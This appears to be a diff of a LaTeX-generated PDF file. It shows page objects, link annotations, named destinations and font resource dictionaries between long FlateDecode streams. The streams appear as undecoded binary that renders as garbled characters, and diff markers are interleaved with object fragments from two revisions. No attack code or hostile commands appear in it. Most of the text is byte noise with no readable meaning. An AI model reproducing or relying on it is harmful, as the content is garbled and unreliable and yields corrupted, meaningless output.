z@½‘sÞU0!\ø[é•j­-£"Œäò_zšT¨ñë#Ïsµßsé×ñŸ³"'y±–;’Øè÷;q…J¶d¤¯ßH?_ÀGÞ'Y…òeþGÿNÞ/`k×ä\êµ? ÓD Nè.ûØ7ÚæÄŒöƒ¦q¢ïÑì P;g¤!t×Fd³0úË™‘„Óãˉ‘„«ç[0Û”?s½·Ëå MÜ7 -t{>‚ÎÆf:U´L²…žéÊ­ôDUm 7<šB±!Ü\Ã+_s.«pDþŒ®Ô øQ,…¹õt`òÅÛA€²M:æ€õü`,š ¤ñû:7ïw°ðƒ°ìç™üëxZ°ƒñKð—೟‚ŸÆNìžç‹9W‚Oc<›…ûa$7&¢µaØ­‹4ÌÂlisÙåSY‰t¯lvÃå檭‘ÔÝ[SÊjôp?ÑÀíÄÉøl+È9áµp¯ì&=F,›Aÿøußê!t„ð {#õD²ž -ùP‰Eò F,ôãÛ#eÉ¢Ø8çUŠ7h[NTÏcèÛ¶•gp«”´Íµë"ì5Ê›Å->I€˜ÛØØmù’‡„j¹2üx^™^Âèšlj@Ë2™Õ"¦»ÞÕÜtUê_KóQÇðƒb -ݱ,õòsmÉ™ª-YX[­N]\?¡±Y›ÈJ}«Ó2†öIímý2Ô#Áˆ"øÔ&³PŒÿ'2 Wî;ÞÛ2ûMØ2+›îg™]«ØÚu–oYMŸZ9á§Ã+"Gšk>]Ãi£óѳ²ÉBUò[ÖÇ6é#Ui´ÓºÓÝEÃ[Ùðh4}½ßL^£CêÿŸOϯÞH¡’úߦÐúL©¯sçÉôËäëÄ0'mcN#{ÏA³ñèêªÍ÷¾åõp2¾¹>,×Ø6€N'£Ë«C¨|ï˜ñðòþr,Åì|:¾>ळ‹ñçÉ=¦ðÃ6aÓ5b‡qšdIY?­ X ¦4ø?@s2†'ÓCòsz|ÔÖg¼•Æ7¼N†pþ=˜ŸM.Æî¯ÇÃVÚN;ý´ŸÖ +xÚ­YmÛÆþ~¿‚0 +”Ì=î ß( +uš àÆ +úÁ‚=‰w",‘4_|§ß™Y‘’x×$( ÷uvvæ™gfå8x âàŸ7_o$|ã@™ +²"²(‚ÍáæÓ¯q°…ñ‚X˜"žÜªC`Ò¾ûàãÍ¿oÞ­on¿S2(D‘ª4X? - +ëmð)LÄ*Ê þÒÛÇrõëú‡Ûïd2[o’\ĺÕJâ’›˜U "žŽŒÆ´è?»j_®"­u8츱éÊmY¯T«H†ÕJ†vßÿ'MØiÆ>Óâª'E”š)" \3ͼ&c_vµ=”w­E}ÿÔtÛýó\Àõü.+‚H©BèT‘ÌE–¥4÷þÙZ¯xó@ßo«$M«-uçšÊðîÌ/}áiƒB©A…”Eœ™HcMGÿe%* Ûã°kjj÷`¡¯ûƒmE{¤‘h¤ï›Ý0´w··²PB¦¹:…µð‘·½Ûq{8BãöÞöÕæö±~«êA´»öïÕöo–¾!9Ÿ¥6Î…0R-ÀˆŠ";»h8¶%-~Â`ë†U¡it*ë4”ý€.¹ÃFkQûþ {q¿H¡e_%2i<µÈÀ Òá÷hØ5l_“ç&l»fh  ‡7{Ú”Ý+ªÏ±6;”4Š*Ä´ +‡ +Fqó1Ø>*ÎéðOÕ°A§îîP§S¡Ì >þÞe‡Z Â#Þ@ÈÊhÛzˆüäaO‡eáŽû»fÜo©}¿Š@‹’:`K7\„UM#Û—,å ïé&9¾`oPÞ³Ô²û†‡ šØïʯcÕùÝ`ЖŽêHÈLµ¯0:³pˆújË2ÑÌsÃÐCÃ"Ùظ£ŠŠÀ¬R‹T1 À0?‹É‹ðãضpÞÈä>¦F§™ÁÌwuãoiÜñ‡%/©8:QÞM_ÊãoÀAo7è&¸…ë-x«0Bª“wßÂ!‰Bëvå4*¹.…!6²»ßñ¬DË׊'0:å1® Æn‡âÚ¦[ÊeY.ŒN/K'Œåü o®øö¹¼²±QiìN) 7úl’Sê†ÄÜSéÉŠVmÐçØ`Pš«)ýá³R³‚“¶`À»•n U,˜êÂIS‰gØëL(Æ”> endobj -778 0 obj << -/D [776 0 R /XYZ 72 793.935 null] +767 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [193.235 415.405 237.799 427.357] +/Subtype/Link/A<> >> endobj -246 0 obj << -/D [776 0 R /XYZ 72 352.516 null] +768 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [302.598 415.405 338.234 427.357] +/Subtype/Link/A<> +>> endobj +772 0 obj << +/D [770 0 R /XYZ 71 806.89 null] +>> endobj +138 0 obj << +/D [770 0 R /XYZ 72 675.685 null] +>> endobj +142 0 obj << +/D [770 0 R /XYZ 72 560.091 null] +>> endobj +146 0 obj << +/D [770 0 R /XYZ 72 342.801 null] +>> endobj +150 0 obj << +/D [770 0 R /XYZ 72 253.027 null] +>> endobj +154 0 obj << +/D [770 0 R /XYZ 72 162.699 null] +>> endobj +769 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F26 632 0 R >> +/ProcSet [ /PDF /Text ] >> endobj 775 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> +/Length 1710 +/Filter /FlateDecode +>> +stream +xÚµX[¯Ô6~ß_¡>d¥ÆĉsCªª¢B%TéXž8<ø$Þ]—lâä,[ñã;öØIvÙT”'_2žû7'ôv^èý±ú°¢0†õ²ÈˊТðÊÃêí»Ð«`ÿ…VäÞÑP<–æ0ÖÞëÕËÕÓÍêñóˆz)Ò(õ6[ä“"N¼Må½õ²ò‚ùo߉õ»Í‹ÇÏi² gINB ui’UhU»àXâ€Å„±Â ˆ Ö¥¬ðŸËz½lvë ÎcàýN +Û¾=à¬ëÛuù÷²•Þançã êÖ2ÕÄ«»±æ=.ÄÇ®Jɶ¹bRèQB¢0G_åP®£Üß?Aâ(ZÇ)‰Ød¨²í®ù)°„ÍI–eHþŠ{¡UŠÁÖ=op攆)_S¿®q¾o•qL;Þ+cz<¹%F·€šÎ-±ñƒ=6ìõ,òš“ùû+ÖD%IMæÔW,¡NIîH~Fþ'-¹qQ:KT·`_€¥Üžpó~$>¯e…úüÛ¬o\»8`pZ‘0§Å$l<±CǵzdþÈÊ@–YŒ³ZëàÛ0fsvÁF%”ìYÛEŒÐðòCW @Á“³hϦ^^K™ñ,#E˜Afe$ cdýÓ:H¢ÄïNh½ž+pÕ‡úÀ;Òpb`Æ»±ïˆIl³k ˆÅ/nÃ$<0Ð_oiÌÂÆLõ·²=|jÄð©íwšæ‘û2zqD2/[dþ¶¦àÝ{²Ö„.×A׫ÑbJMAÉmP`„ À8|@ š“²áÛÁ€plŽQ¿ÅÕòÈ#–5–%ÙŽµƒô‡QhP<ŒáâÃB]C1c$]`˜oE0ö×’?IHJ©#åMu…-Hœf춠쵲@:Ér›s©U·=ˆA„oTøG­¹0®Ì}Þuµ,ù®¶ŸM‚Ã(ƒ7À@9` `shwÓBîœ!²ºCtšà¨K‚ÐHµm°à“¨Â#P¯ðómÍpkuÃe)ú;!f<Ö³¼?´Û nÝ6RçQŽX:GÙ¬¤3ßZÚ¼¢‚KŠÑÔßì¥%;ÈÝ^‹pÙÉe©sU¯«Ë€ž“̦œçô²Ûk»uVzb‰@k3*ƒR»g¹÷ž•j µªn%f襥Üè܈…È6.¬20¹«%$—™¾~ù'Ndó÷¬`蛸l‰UƱÿJpe€þ¸_Hhˆ9¸çÃ…8”ß:nÎÔ-·Ò«Ö +ÀeÓÚ£ÐQ⽬O¸Ñ‹A»È’¶ãÐÃuÓ5ó<; SžêDAÓ]NuùHÛs©ì”#¹’»†×¸5´8ê3oU³½wGfØØÃ.¼Â~ͤL†QÍÓ™…ÅWŽøB¤çƒÂt~‘XPoô—ï‘; W +¯«Á$®¹²åAVMs…<G¹½°Ò~³ù^töŒ¤))VuYweË—„na"°*¶¡¼ ivÙó-‹¡žÅßVZ#í‡#}éÌ íìm÷ëjʉÉkÖ€{©äàº!]-LÍjÛp8°ã¡’À‚|ÉÌ Mm§n†¾ÃÎj~’‘$º°Ó$è†ZÎ%oÑØÌq¢™B™/BÉÐjÙŦ(ð“÷¦Ä»¼mOÓט¯AeçñÅ’çÊÁê •ÕIïW …4½jN§ˆÀ¦¸7*÷'\r …«„îÈì"ß@ï³{>èҨDžS:]5x gËÆî”N×°±÷óX@ˆã9o^ýé,–l´,¯HØ™B‹´x ¤ëX¼7Üô–[õÛfš»ËX#˜G))Ð +ûèâŠ|z1ÝAxÓAƒ ÿÁJñÕþgП£ý¢TX¿»V×µÆ.‘ZéÊÈÞ¶ÚK÷𦴻º>nqŠ)B®´áeÃɵýæÓ±©L× } ¬ëú·šûŸžlíW_kéÎ|ˆº}çHxÝp5=ëKÏi^B¶21]ÜÕ™7õs¥®MÁ>Bªýèjü^ˆ.eï±²~©&âÉï)‰ÍX×AÙ6VºHþ@‰Ã¾¼Røbb?XØ®oÇNۧ̓FãZVMÀEÈ a«ÎàgÃözeº9å²vy†¤X¡`½¬±:=!uj‹Ã9U¿@6ÐýŠ¹Ñv€ªnföß‹¨äÔÿüÏ?O,ó@ œ»Çoù“²¹ùýæê³üÙfõ/èR +endstream +endobj +774 0 obj << +/Type /Page +/Contents 775 0 R +/Resources 773 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 762 0 R +>> endobj +776 0 obj << +/D [774 0 R /XYZ 71 806.89 null] +>> endobj +158 0 obj << +/D [774 0 R /XYZ 72 760.449 null] +>> endobj +162 0 obj << +/D [774 0 R /XYZ 72 630.564 null] +>> endobj +166 0 obj << +/D [774 0 R /XYZ 72 401.552 null] +>> endobj +170 0 obj << +/D [774 0 R /XYZ 72 341.358 null] +>> endobj +174 0 obj << +/D [774 0 R /XYZ 72 142.385 null] +>> endobj +773 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F26 632 0 R /F14 615 0 R /F27 638 0 R /F24 614 0 R >> /ProcSet [ /PDF /Text ] >> endobj +780 0 obj << +/Length 2005 +/Filter /FlateDecode +>> +stream +xÚ­XY“Û6~ׯà#Ue2$Ás«’*DZk=¶G®<8©$Ac^&È™¿Ýè&$j8»Þfˆ£Ñ7¾n(pŽNà¼^}^…ð œÐÉ"'+?, +gW¯>þ8{XÿÙ ü¸È{CU;qšÃ·rnWïVßoVß¼ŠB§ð‹4JÍx¿‰³Ù;ÝÄ_{y»´<ªõ›Ÿ¿y&ôq’ûA u$d°jW¼=&öbáÇq1 ˆ}±öÂ0.ÜáënÖð÷ví‰[˜°…/Úf7ö½jÖ"r2òÇÍæíïAÜ¿¬íÕçQéAm[‡S¯ä^©}?†¤u©éÛÁ'w[­Ëm¥hihé«iOíÊÃ¤–ÿ*kTq¬i¡áI”¹[XÉ\ÕãFâ¶"ØY/!ëpå%\²^by’Iõ窖ݥê‰+« +òªE™÷ÈUíçúï[½‚î …ŸFìÞÍ !܃’ÃØ+šô˜, +V¥2û±‹ „[h6Ýn›þȨóþõÊùhÈÕPr4Êæ8ƒ&C¨n æD™Ý“²9©¾Xµ-…e8ñæ´Þõ-oöW[À]Ÿ ¾Licp”g“Á<“]G¶FyŠ!A_ÒØ„(¶ý8(ïÐö;^Ð65-Ô÷'ˆ­Ùã{9Hâx˜œ‹§3÷„2“fû¶QÓ龧‰; +{ ‰I¥KþÛªé !¾}8õ/¾þž( +wP$¾)1ËàÓ8v_­á¶=0¼qPÉaP¼¸“Z=ƒa˜Ú<Äåß÷z˜hªÝˆù(tÍœ—jŽI£vuMúÞ‡n&Íé+—ìÓà?º­¹Kê‰ A®`«ÙÓ5ʧk›/å)8!†äy))¬—<‰QÉL$@ı¡;–óËá¾}©îЫ,ƒ b({¹ rƒâ¬¿`!¹#T¤ÀèÈ0³záX5{ôs˜sæÑ>⎮„ãR©é{©2óò˜‚ò“Áæ?v¼ÜÒ7£Ïzë ½pwåD@®Ü–Úf'Ä@VÇàTóÅ®»JÕ ˜Ê¢]ÊÃÅëþ¦Ð]Ð4°;ÌÈ,E‹He(Î7›æû–À_Ó´i™“„¬ 5±#O>Ð.–q7 éÂàâU.ï 896/ëÊ‚Ãl•É Qº Ýr]e °Û  vT<ÔŠ) °+~˜ ?Á\hÃ`¡Â†1¸ÝÖâCËÚpÝìa¡–ÍŽ ŒEl`ˆz ŠéUUÊm‰è)HÞ$Í¥ž@ýº£ óÜxÜx¥Ü–üóáö +âfëõ{lOn>¼ýóÅÍ›Ï×x­0{Ï +–{ Q&Õ`iÿ•[•# {}™iËv›ÿ{O;aèIMMYì¹íØMK%îO6åþ«zÃnÛÁ‘©*cŽdb²¡Mîjh2jã$!& ݼWÂûS9Ý'$è‹j`¤ç¡Z ´Ù‚(^¦ÈÃÉ»rÏòv£Úš\–4ØꤩU‹= Y‘Ë5ÑX×ÈŠS^ÖS–0y¹ëËnXL·Gío⇜g›5´b`„Übþ*ê­µ°„Y¦Mš}Ý'L÷¥–ï1"yâîÕAôÑd*ä¨íÀðSOùXrE~ç“è×/7K`P^„Í,ÞȘ¢rÅ8ƒdNÓéÌÛ›Û%Æ L\6ûšœ.Þ—wë©å‚ÎûpÆ%ƒép¦–¦'éú@›WÈ$mìÚº–žVx±©Ïƒ½ªÔœâlêËÔ>[,8c,¬gô˜ã·3v¨èH“{œØ¶)LG‚€ëݼÁÇôð©Ùãw$,Þ—`™mMõéàqpõÔØ+r´éÊ´@ô6˜Qe³»û  «bD‡sê>Uà¬Ä¦Å@-,ÿ +àÅI臑˜×xü wêÛÊÊ(û̶…ô¥ šíð°P«g ÝÂf…œ+B¹_*@Y>»&æ— ôä}IS@ÃüK/bZ%Ú¦z@“ŸN˜:ÇR’@)¹(¸^ÍU¹6¢@y4úE¡é¹®-6°q’ùyV\7°Ð pcñ + úéAäb*nÂüª°•šgp×äÑ<“¦_ß ‘yЃªiÜ@x¾v»ßÖzöûÎô}¹YýÕ>Çò +endstream +endobj +779 0 obj << +/Type /Page +/Contents 780 0 R +/Resources 778 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 762 0 R +/Annots [ 777 0 R ] +>> endobj +777 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [183.775 536.542 253.58 547.333] +/Subtype/Link/A<> +>> endobj 781 0 obj << -/Length 1002 +/D [779 0 R /XYZ 71 806.89 null] +>> endobj +178 0 obj << +/D [779 0 R /XYZ 72 760.449 null] +>> endobj +182 0 obj << +/D [779 0 R /XYZ 72 692.564 null] +>> endobj +186 0 obj << +/D [779 0 R /XYZ 72 615.865 null] +>> endobj +190 0 obj << +/D [779 0 R /XYZ 72 417.904 null] +>> endobj +194 0 obj << +/D [779 0 R /XYZ 72 343.142 null] +>> endobj +198 0 obj << +/D [779 0 R /XYZ 72 267.383 null] +>> endobj +202 0 obj << +/D [779 0 R /XYZ 72 130.745 null] +>> endobj +778 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R /F24 614 0 R /F11 664 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +784 0 obj << +/Length 1904 /Filter /FlateDecode >> stream -xÚÍW[oâ8~çWD£}HVŠ‰c“ ÒhBhB‰éEl…2$(ÚáßïIlha æ"íKm™ï;þÎÅ'§š4•4éªòµ‚aÕ$,™ºdÚ¶-—•á£&Màü“¤!j[ÒKZJÔ°`]Haå¦Ò`•jKÇ’lC7$ö…Û È&5‰M¤¡\CŠjÙT¤Ñ4VÙ§j ×ÞàiÍBƒšZ9¤¢ i`Û,À4Ǫ”„ É7ˆR›s†?*jM¯É-?¸ G­¶ï…ù•‡úc=·'a Y:•T¬ƒ'„Ó’õüy¾ˆ§q³Ý Ûõ\Vàµ÷¡}/ }WÁ²WÀÕSö÷²®û|ýW«iÑHËùÓ<ÍÖQ¶ZÃæ¿ÉŸÑÚl8¿î=r©Ó þW1Ìï -AøA—Ý"œ©Òät*õKbâÜŒœf§ ÖºíõôGýÀ÷‚DÏr¡×î÷”s× Øµ×e@i»óš¿ï‚Ô¹ìÞéõ~cq6=ßcÞ4ƒdÇ®J{ëÝ{î€yy€ÎRé9joÔø@õGMà6œ°Ô•W¸Ÿ‹…ra^g2‡AfÛnX†~îË¡´—íÎÏI…p„¬ÙÞCqé¾ËpÍiÞæ…–gt‚nÎ8¾ãLzþ W”'Þ+×4Üà¶xû|wÝr~Ü ~Ýkx=yÐ!ÛEôJ± ”]ö3¥|EFIø× y·m× K´u^°¼ò¯Õ™þö»ÛÛÚÃû]™…ׯџkþÐûÀ¸ä£÷};¤¥MJùÐc,©:E¦‰¹‰Å"òj£¨„y=ñM´HW|—¬WŠnÊÏóI̲™˜ÂtýmŒ1"Zm7†©ƒ÷c¸Þ´wU’ÍWâºL\–&Šª[r<žÙ¾Þ*oÒxÍ^f½Í…­ÀÙ ‡¼(Àào&ØŠŠeŽ‹6ËŠ1>0N^ã˜"‘H½†4‹5M“+ö¾EËd!(;é‘ÆÛÖ€áÒ6vŽö¢Ë«4›®ãðÆÜBÕN„†gJ÷Ì,ZOã¬~0Ñž[']¬ÛHƒZÕ 2ˆÁ þÅË$Ùf³\¾O!~_Ë(AÉ–Ÿ¨¾~˜eYR¯V±©#l Ò‡Lp5-Õd -›*(ÍŸ2”Ì’æ“øƒ°Põ5®bìÁ„¶ÅúaÕCÉpqGiÌqËè)ÿ7fäø)nÓ,^ò}^EBË^€Óú©n²¹‡’Þkl—Ìàã(Û$“2Ïz¼Ž¡fóÉÿs™®—nx+§ŠÆc•ÿ¥ä‹^ +xÚíXKÜ6 ¾ï¯ð­³@GÑÃò#- +$HS4ȶ ²EIÞ±f×ÇžXžÝÌ¿/)J~Ì:AÛ`sêeDÑR¤È”xtñè—³gF‰(•Qšs&ò<ÚìÎÞ¾çQ ügqžEwnÕ.Š“ Æ:zsöúìéåÙ£çRD9Ë™D—[’¡X®ttYFoWš¯³<^ýa‹ksþþòÅ£çBOÖÇ:c<nµŒqÉ÷[‹Öþó:V,ŽsZôôx¾Vš¯J³-u±²ë]±§Å¡owE_mŠºÖöfÓ[ZÛßâÞËle®ˆ[œ‹€Ÿ(øs_µÍwþ/WÅ×~X›¦ô‹¾¸*¬¡ï»¢Aû€0͹LW=-²GÛ›¸ ΓÕ‹Æak¡X"3²¦ÝÂR¥V·ø7”ÐálÕÙÃfŽ5™ã,_pªˆY¢’°æ{R0xèí<£â•=ì ¶µó|%ÿಶ®[´û®j®‰51þLfï`«£Ù¨Ê™mÏöOö¸Žc–¥*Õ,Uþhßq‘žþijR*Øuq|óúåUÐòµLçÿEÃï]±©Íƒªx…îmmÝ™‡¶æ¢Út­m·þP¦£àë¾¥ú'høfc¬}P­`eÕ?ì>¯:sUuåÃÚqtY÷ *ž¼¢£¹(>={ê°j-c–ótž¤¿biÎ:"ŠÏòH“ζmˆãVUm‰ì[ ”=1‰9Ò"çÙÓ‹7DµÍ¡Æk¥Á…1UóH«‚î›Âk»rèfŒçW ¡Dˆ5`´ªw\Ŧœ¡³·MŒµ\U[.]4q僌–áX Ï%ÂxUznãGØæ­+=4Gõ͵ÙwÉÀŽ³]›ðç}çù¶*ý¿çhŠ£„«)³Os§"‡œ:1©³¦Þ.¹à×Ü°kæk‘œ„Ô,‹‡øÙŒÁ¡/”$-™Ì‡²2TÅ”'«ççYLn–ÂC:T%ÜÀ%­ aËÍcÒàéBjGlŠjœ<å?U ‰%WIÕ»SU¢ô6§¥¬ó¢&X¦ã¹\—²ú/îÖt÷¾@•°dl~Zªõ‚ñ|8ôÚ}e"gjtþÄ¡ZjŸ@H×zÜR8Ùˆà9ËÄ ãAMš rÝK²º»1Y’5†à×nKýsOW–6Và !Ùµ^5¦:r}d:]î»Kü⛫Äeà„²J¦L¨l5þ +BÔöE³1 ¶é˜v„-iÆ—¶3γ°fêS »¸å I!’åØ™s®„C}c§9 +ŸÖúø´Õ@Ï0²\$9\&M|ŸÉ$ÌÃ>S¦|„BdOðþ¶3ÍÆ]¯×[è\M·w‘]5ýR´q–$Cf÷íµ#êHÕ]Õß,èH8`A6*)¯vvA²L¥zÈP=ÔD_×d`Û 9ë¨:‡CŽã" ó©7­üMÁ±|éè†ÚÊ6\›¸þL@ù„Þ•¬M¨€ÿ¶Å'Úm>Sᢀ—äK¯¿C¼aÛCGŽv:Mý +Ð$~k{´V#¢} 0ÿ$Öº=Õ|äVváÂ$¸ˆ§Ð´ýgrD  +&ƒÚîHR]%BUØ:ôž´ôÍö]Û\×~eg6ín€¥)ý6[–:Úe¿°K)Ó#NùxÈ2×yÈ,…P’R˜Eg5ËNû–ÓÔpñçqŠ~klá\8¢3K… +«™‚³qK®¡sÙ`¢d!«²YþÀlôœ_O¼!y€nñJ.!áÁ wÉ>ùû‡û‚îKroì@*wN7›ÀÄ (¶Khµö«f¹çÞZ1ykIƶ?œ¾µ$Ó·–$¼µ$î­%¥·˜û}=}aIî½° ÎÑð—Ó8߀>4ë¥îµ4]}tŽuâœíúnÿÌRP0Pj‡EA*ÒÐv4Dâ U5ˆÍÁŽc¸[œ–ÆkÀ²Mš·~Ñ£gõ7~GÈœô±%ýÇÒᦫ|L’îÎ}Ø—Y²{×N\5ÅüáéGÍž~ø á8>çÐÄA“HùŠÿâCÀ-þŠwž—”¿‡Ozûý³jJªSö W_xšš?½û¬­®jC,„|•€Ÿñ\ÛhþÞêÜxâž«=‰híïsNÝ–ÆBqRÔXh4qðI5×ûmÚ6¨,gH]í»'Ê_WA¸k`èaOT¯N¬êñÂøÁþ–[±\¤K[ñÌÇ'H +œ ’Âì’oˆ; Íš8¿§Ãz|؆› VxdŽá‰:[]…Gb¢0à +OiFFÍìwUÿôÍú´Òàͨô=iµ œ>¼\¥= ¥}À0þ|yö7YöUH endstream endobj -780 0 obj << +783 0 obj << /Type /Page -/Contents 781 0 R -/Resources 779 0 R +/Contents 784 0 R +/Resources 782 0 R /MediaBox [0 0 595.276 841.89] -/Parent 761 0 R ->> endobj -782 0 obj << -/D [780 0 R /XYZ 72 793.935 null] ->> endobj -779 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] +/Parent 762 0 R >> endobj 785 0 obj << -/Length 1485 -/Filter /FlateDecode ->> -stream -xÚÍW[›8~ϯ@ÕJ…ÕÂ`cDZ­zÙ®Zõª™>M£•Lb•[1Étþýžƒmr)3µ}Ø—Ä6ŸÏÝŸCgã„Î?³/3ÿ¡Cœ9uæY,sÖÕìz:9¬¿r€e©s3 *‡%)ü—ÎåìÃìéÕìâ%Nd Mœ«Bˈ‚,Š«Ü¹vãÀóÓŒ¹ßoyõêâ‰ð,NƒÀÍ2„ÌB£šã›Ï>‹Æ2 z¢<Ÿ…̽õhê6;=YóZ”qÿ€ ¥n.ZÏ.Õ¹çWâh£¡ÙÒo…ì”èô¨í¸v”0¡ŒLõ¥¬x‹°È•¹¨=:w{ù)Œ˜Pfµ¸S®4®§9ïùŠ+«x NªPdêöè ð‚O¢ ¡©6]ݪ^TžE "¯d-Ußñ¾ép‰¹mÄojÛ Œ¥§ýV*uÑtï%ÚŽŸjñµ7 Æ‚…Æ¢Ö5¯D0j’óù\kòl¤9'm7»·èPSzê„›ÛP?û8‘ `kÇ•kÑ3ÙãèÞȲÔ+ë¦Vpdwü˜Ý¡‹‰1ÌKiÁ®w]gÝ=eàèËÓs4rW p¹Qfp–6]îe‰i2xËŸ'AR=“¸…ŽÓq<ð¼Sÿ&û÷W^µ¥Ðx,n¼z\p TF–X—½÷"ê6ªßtâòÃkØ•FnDA<ál(uÆÆ=ï6¢_œÔß]ÿ B⤠(a(È'4 B¨xŸ²€cÁožÓØmoû-êc•4TOÐÞê§ÿmû¾]\\9 HPp`ID.t¹]´\€†ÿʺÚmû—Ìÿ$ŒÀú-Wê¦ér¥×>‘ˆ ŽÍ@% ?EZ5ÿ£Æ<3ÿþÿ™KtìÌ0&KMº_A°ãt$jÅן}¹‚‚ž?}s¹Ð²Þ¢`¶ òŒs®·ÛEU-h¼Ô¯_¾^¼3ÓBôë­Ä>…3¥½ž :¡Èw$v¢ï¤Ø‹|a¢ÕS? êT¹C ³Ú)퀣ŠÐÛ0ûÏÌa?jΩõ®Z #½)¾s¼.q=ÖNÀö®Ÿ(Á~È§ä§ ¹Ciö­Òç?ì´¡]á`h8ø²Ý­=¼Ùã­— “Í[nÔ¨šNXÜÔ2׊R”y`ÊÛÜŒ8Ö]sNscl¨[(½(û)í¡´“Up±Ézm’•”Ö'²2*ñU)4Ì~±q9³¹ÙõíÎH„¯ÆY…­8kê¦1aaPá?_tä)Ã$ûi!\+£;%'u~ÈÙ¡Œ“Úý¾ú~¾šçØ ™zi(®4|X? -¥äÊR,Í~Ù9Ç;"Ä‘[B¢BVhôhدäpGÑAç<îR@X€ÞáM€s†!Ž~Á׊\ =X ä -ü~ÖØpÂUˆVÑ_Ai ܆C翆`¥¾G1!Žè\¬>g^|?¦æH_<|-Øûå:YÞßÅ*ÕÝirQÞPùj’rXÀÛ¦ë·7wÝ;cGÝ­Ô½¨ýVŸt^(è”p>ÕÄtÒsû.ÜÚw³y³Œ½ì¸¤†^¦óû›^6àŠ³×åi/ÃO‡^†³ó^†{ŽŸ¿öàw_—â*3ê9šÂîKCÙÀñÃ[ÿÁmJMõ)FÀŸÉ¡O¡ÔI‘,H]é3a$ ¢äÐôžOVçßW³ÿ¥œ -endstream -endobj -784 0 obj << -/Type /Page -/Contents 785 0 R -/Resources 783 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 787 0 R +/D [783 0 R /XYZ 71 806.89 null] >> endobj -786 0 obj << -/D [784 0 R /XYZ 72 793.935 null] +206 0 obj << +/D [783 0 R /XYZ 72 357.759 null] >> endobj -250 0 obj << -/D [784 0 R /XYZ 72 358.026 null] ->> endobj -254 0 obj << -/D [784 0 R /XYZ 72 113.187 null] ->> endobj -783 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F26 513 0 R >> +782 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F14 615 0 R /F22 546 0 R /F11 664 0 R >> /ProcSet [ /PDF /Text ] >> endobj -790 0 obj << -/Length 922 -/Filter /FlateDecode ->> -stream -xÚ½Vk“@ýÞ_11&Ò(3¼71†­lív×B5f³!ØÒ-‘— UküñÞah×®01òe&Ã9÷Ü{f¸ŒŒî‘Œ&ƒÏ £Œ022,Y–…–éàöNF+XdIµLôµF¥HÕMä ÞÎýÁè‚`dI–Ntä¯y E² ù+t+hÒP4-UXÐð>Þù¯GXû¯j¦$«£eÈMjHl^‹ª"©ªÅAn5EbÊÇb(SÈ)?&_ªr6ªB” áÕ6Ê°Ú¿Ú4“$¦M |ÍÑUš ë¼ä“0IødÂûF›†+ )Ó0„&ÝÑ*JŸÑc -•XYP’ˆMÉ0t^‡ó-L‹}ÆyÖÈqŽ<Õ¡xKß{tµóÞNl*`®,éÆ W MÂæQ…å}TYû§¤udB ]eDŒÈXC"1$]VxÀ§CQ#šPìª Ë›Í)Xñ9IÃB*v|EÜòñɦªŠ³ÑDºD `±‚G´&ŒÒLFag•TlŠ—ñê~ÒD¬¸ß˜zá å½¥D•,³±ôUcøÇTl1Vöp²)â7 üîâ¹øøaÉœ|žñUÎÿÁ¶4*!yl(D†µ$ÔRvœ­sP¦açY@—›( O[`üâý·&(G&Œ/í¹=öyà9À÷À¢YÆ#CŽ_O§¶ï^Ï‚ñ%"ø}s3uÇö¹;uýý£M~‰éªº¥w¡W³àfî¾sAwêLÆÃ2QzðT'n…¾q>Ì$<{â0M5[i7óë (y6°FH»Æüzỳ:uÍPõV«½ñ¥seÿ}ÉœçÛ§5a}ØÏwǽ6Á·Ï§x4óü9Û|wæ÷ʈóêB¦ÀÛÒålM«·ÎèJlîN&μ—­ Î+Ï…{ž ‘ ÒªðÎuÞ{ÿ³c° ’ÿÞ$ŽÝZæÉ6ÍhP”1ty¬è -;üQM«ýÛ_o³%3ÓTÛq›()‚%\îáß…ËÒÍùí¾æåªOÆ5¾ŒÖ™A#ë­QåE¼<ýÙ{¸ÉÙµ¦»Ú¢Ì—}q‡éühù9ÀqG¬â4 -¾çYÔ§ÀAÂ.^aÐh™g+vÁìè Ô,¬ïl}þ>¤Š‡0£1ûŸEKíè%`Õ®eÝìÈ–]Z·æo?·ßnyŽ?ø ”£ï¨ -endstream -endobj -789 0 obj << -/Type /Page -/Contents 790 0 R -/Resources 788 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 787 0 R ->> endobj -791 0 obj << -/D [789 0 R /XYZ 72 793.935 null] ->> endobj 788 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -794 0 obj << -/Length 1411 +/Length 1751 /Filter /FlateDecode >> stream -xÚíWmOÛHþž_aU'á¨ç÷Åo‘z'(¦¡Ä•BNìëb'h¤ûñ7ûb'M€/²ëõìÌìÌ3³mãÞ°/­- £m`Ã#†Ø1Ì[×·¶‘Àú‰a#øÆ£Ê æú0NŒ~ë[ë juŽ6¸Ä5¢‘ÔAQ@#JŒkÓAm˘ù½ŒïÓömtÒ9ÂΚ­º¹Û6‚i×ðA‘˸" ‹;†E<„=BáomË!Ž9[Vcî7Ÿ—mlþ˜äñ Í–rÅZÈñøªfÝNv#ì" -ASÜ)ņN¾„I<¼ËŠ -ÍƳ?³äþ ´€¬%c)n0e"¨b˜ðÐBph!S¥e• ”‚>2Ó–™P»C¯òp¨€Ð]m£°Ÿo°•&e¯±âÝnH(>ZOüÚßGÝþ¤E™ÎáÄأƵw0ô""¶£uæï‚d¡Ãd€lZ¬7‡b`ò¯PŽØFà‰5¦y”½ 